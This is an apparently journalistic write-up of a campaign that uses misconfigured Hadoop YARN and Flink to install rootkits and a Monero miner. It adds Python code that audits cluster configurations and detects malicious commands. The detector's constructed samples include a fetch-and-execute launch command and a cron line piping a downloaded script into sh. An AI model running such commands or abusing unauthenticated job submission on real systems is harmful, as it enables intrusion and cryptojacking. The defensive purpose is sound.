New cryptojacking attacks target misconfigured Apache Hadoop and Flink with rootkits


January 12, 2024 | Newsroom | Cryptocurrency / Malware

Cybersecurity researchers have discovered a new attack that exploits misconfigurations in Apache Hadoop and Flink to spread cryptocurrency miners within targeted environments.

“This attack is particularly interesting due to the attacker’s use of packages and rootkits to hide the malware,” Aqua security researchers Nitzan Yaakov and Assaf Morag said in an analysis published earlier this week. “The malware deletes the contents of specific directories and modifies system configurations to avoid detection.”

The infection chain targeting Hadoop takes advantage of a misconfiguration in the ResourceManager of YARN (Yet Another Resource Negotiator), the component responsible for tracking resources in the cluster and scheduling applications.

Specifically, the misconfiguration can be exploited by an unauthenticated remote threat actor to execute arbitrary code via a crafted HTTP request, with the privileges of the user account on the node where the code runs.

Likewise, the attacks against Apache Flink abuse a misconfiguration that allows a remote attacker to execute code without any authentication.
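The two misconfigurations above come down to cluster services that accept job submissions from anyone who can reach them. The following added example (my own code, not Aqua's or the Hadoop/Flink projects') audits the relevant settings: it parses Hadoop-style `core-site.xml` / `yarn-site.xml` fragments and a Flink `flink-conf.yaml`, and flags the states a defender would want to fix before an attacker finds them. The configuration keys are real Hadoop and Flink keys; the sample fragments and hostnames are constructed for the example, and the severity wording is my interpretation.

```python
import xml.etree.ElementTree as ET

# Constructed core-site.xml / yarn-site.xml fragments (not from any real cluster)
# showing a ResourceManager that accepts unauthenticated application submission.
WEAK_CORE_SITE = """<configuration>
  <property><name>hadoop.security.authentication</name><value>simple</value></property>
  <property><name>hadoop.http.authentication.type</name><value>simple</value></property>
</configuration>"""

WEAK_YARN_SITE = """<configuration>
  <property><name>yarn.resourcemanager.webapp.address</name><value>0.0.0.0:8088</value></property>
  <property><name>yarn.acl.enable</name><value>false</value></property>
</configuration>"""

# The same settings after hardening: Kerberos for RPC and HTTP, ACLs on, RM bound to one host.
HARDENED_CORE_SITE = """<configuration>
  <property><name>hadoop.security.authentication</name><value>kerberos</value></property>
  <property><name>hadoop.http.authentication.type</name><value>kerberos</value></property>
</configuration>"""

HARDENED_YARN_SITE = """<configuration>
  <property><name>yarn.resourcemanager.webapp.address</name><value>rm1.internal.example:8088</value></property>
  <property><name>yarn.acl.enable</name><value>true</value></property>
  <property><name>yarn.admin.acl</name><value>yarn</value></property>
</configuration>"""

# Constructed Flink configurations. Flink's REST endpoint has no built-in
# authentication; mutual TLS on the REST port is the supported way to restrict it.
WEAK_FLINK_CONF = "rest.bind-address: 0.0.0.0\nrest.port: 8081\n"
HARDENED_FLINK_CONF = (
    "rest.bind-address: jm1.internal.example\nrest.port: 8081\n"
    "security.ssl.rest.enabled: true\nsecurity.ssl.rest.authentication-enabled: true\n"
)


def parse_hadoop_xml(text):
    """Map <property><name>..</name><value>..</value></property> entries to a dict."""
    root = ET.fromstring(text)
    return {
        (p.findtext("name") or "").strip(): (p.findtext("value") or "").strip()
        for p in root.iter("property")
    }


def parse_flink_conf(text):
    """Flat 'key: value' parser for flink-conf.yaml (no PyYAML dependency needed)."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        key, value = line.split(":", 1)
        conf[key.strip()] = value.strip()
    return conf


def audit_yarn(core_site_xml, yarn_site_xml):
    """Return a list of findings; an empty list means none of the checks fired.
    Defaults used in .get() are Hadoop's own defaults for an unset key."""
    core = parse_hadoop_xml(core_site_xml)
    yarn = parse_hadoop_xml(yarn_site_xml)
    findings = []
    if core.get("hadoop.security.authentication", "simple") == "simple":
        findings.append("hadoop.security.authentication=simple: RPC callers are not authenticated")
    if core.get("hadoop.http.authentication.type", "simple") == "simple":
        findings.append("hadoop.http.authentication.type=simple: RM REST API accepts anonymous application submission")
    if yarn.get("yarn.acl.enable", "false").lower() != "true":
        findings.append("yarn.acl.enable=false: no queue or admin ACLs restrict who may submit applications")
    if yarn.get("yarn.resourcemanager.webapp.address", "0.0.0.0:8088").startswith("0.0.0.0"):
        findings.append("ResourceManager web UI/REST bound to all interfaces")
    return findings


def audit_flink(flink_conf_text):
    """Flag a JobManager REST endpoint that is both exposed and unauthenticated."""
    conf = parse_flink_conf(flink_conf_text)
    findings = []
    if conf.get("rest.bind-address", "") == "0.0.0.0":
        findings.append("rest.bind-address=0.0.0.0: JobManager REST endpoint reachable on every interface")
    if conf.get("security.ssl.rest.authentication-enabled", "false").lower() != "true":
        findings.append("REST mutual-TLS authentication disabled: any client that reaches the port can submit a job")
    return findings


if __name__ == "__main__":
    for label, findings in (
        ("weak YARN", audit_yarn(WEAK_CORE_SITE, WEAK_YARN_SITE)),
        ("hardened YARN", audit_yarn(HARDENED_CORE_SITE, HARDENED_YARN_SITE)),
        ("weak Flink", audit_flink(WEAK_FLINK_CONF)),
        ("hardened Flink", audit_flink(HARDENED_FLINK_CONF)),
    ):
        print(label, "->", findings or "no findings")
```

Point the two audit functions at the files under `$HADOOP_CONF_DIR` and `$FLINK_HOME/conf` on a real deployment; network exposure of ports 8088 and 8081 should be checked separately at the firewall, since a correct bind address on the host does nothing if a load balancer forwards the port anyway.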

These misconfigurations are not new and have been exploited in the past by financially motivated groups like TeamTNT, which is known for its history of targeting Docker and Kubernetes environments for the purpose of cryptojacking and other malicious activity.

But what makes the latest set of attacks noteworthy is the use of rootkits to hide cryptocurrency mining operations after gaining an initial foothold in Hadoop and Flink applications.

“The attacker sends an unauthenticated request to deploy a new application,” the researchers explained. “The attacker is able to run remote code by sending a POST request to YARN, requesting that the new application be run at the attacker’s command.”

The command is designed to clear the /tmp directory of all existing content, fetch a file named "dca" from a remote server and execute it, and then delete all files in /tmp again.


The deployed payload is a packed ELF binary that acts as a downloader to retrieve two rootkits and a Monero cryptocurrency mining binary. It should be noted that many adversaries, including Kinsing, have resorted to using rootkits to hide the existence of the mining operation.

To achieve persistence, a cron job is created to download and execute a shell script that deploys the “dca” binary. Further analysis of the threat actor’s infrastructure reveals that the staging server used to fetch the downloader was registered on October 31, 2023.
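The launch command and the cron job described above share a recognisable shape: wipe /tmp, fetch a binary over HTTP, execute it from /tmp, and schedule a re-download. The following added example (my own detection logic, not Aqua's or the Hadoop project's) classifies command strings against those behaviours so that a YARN application launch command or a cron entry can be triaged. It assumes the defender already has the command text (for instance from NodeManager container launch scripts or from host-level process auditing); the sample commands and the 203.0.113.10 address are constructed for the example and do not come from the article.

```python
import re

# Behavioural indicators for the chain described in the write-up. The patterns
# are mine, written for this example; tune them to your own job mix before use.
INDICATORS = {
    "wipes_tmp": re.compile(r"\brm\s+-\S*r\S*\s+/tmp(?:/\*)?(?=\s|;|&|\||$)"),
    "fetches_remote": re.compile(r"\b(?:curl|wget)\b[^;&|]*https?://"),
    "executes_from_tmp": re.compile(r"(?:^|[;&|]\s*)(?:\./|/tmp/)[\w.\-]+"),
    "pipes_download_to_shell": re.compile(r"\|\s*(?:ba)?sh\b"),
    "installs_cron": re.compile(r"\bcrontab\b|/etc/cron|/var/spool/cron"),
    "drops_dca": re.compile(r"/dca\b"),  # the downloader filename named in the article
}

# A fetch alone is common in legitimate jobs; it is the pairing with one of
# these follow-on behaviours that matches the described chain.
BEHAVIOURAL = {"wipes_tmp", "executes_from_tmp", "pipes_download_to_shell", "installs_cron"}


def classify(command):
    """Return the set of indicator names that fire on one command string."""
    return {name for name, rx in INDICATORS.items() if rx.search(command)}


def is_suspicious(command):
    """True when the command downloads something and also wipes /tmp, runs
    from /tmp, pipes the download into a shell, or installs a cron entry."""
    tags = classify(command)
    return "fetches_remote" in tags and bool(tags & BEHAVIOURAL)


# Constructed samples (not captured from a real incident).
SAMPLES = {
    "yarn_launch_cmd": (
        "rm -rf /tmp/*; curl -s http://203.0.113.10/dca -o /tmp/dca; "
        "chmod +x /tmp/dca; /tmp/dca; rm -rf /tmp/*"
    ),
    "cron_persistence": "*/5 * * * * wget -q http://203.0.113.10/x.sh -O- | sh",
    "benign_mapreduce": "hadoop jar /opt/app/wordcount.jar WordCount /data/in /data/out",
    "benign_healthcheck": "curl -s https://metrics.internal.example/health",
}


def triage(samples=SAMPLES):
    """Map each sample name to (suspicious?, sorted indicator names)."""
    return {name: (is_suspicious(cmd), sorted(classify(cmd))) for name, cmd in samples.items()}


if __name__ == "__main__":
    for name, (flag, tags) in triage().items():
        print(f"{'ALERT' if flag else 'ok   '} {name}: {tags}")
```

The `benign_healthcheck` sample shows why a single indicator is not enough: a plain `curl` fires `fetches_remote` and nothing else, so it is not flagged, while the launch command and the cron line each combine a fetch with a second behaviour and are.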

To mitigate risks, it is recommended that organizations deploy agent-based security solutions to detect mining bots, rootkits, obfuscated or compiled binaries, as well as other suspicious runtime behavior.
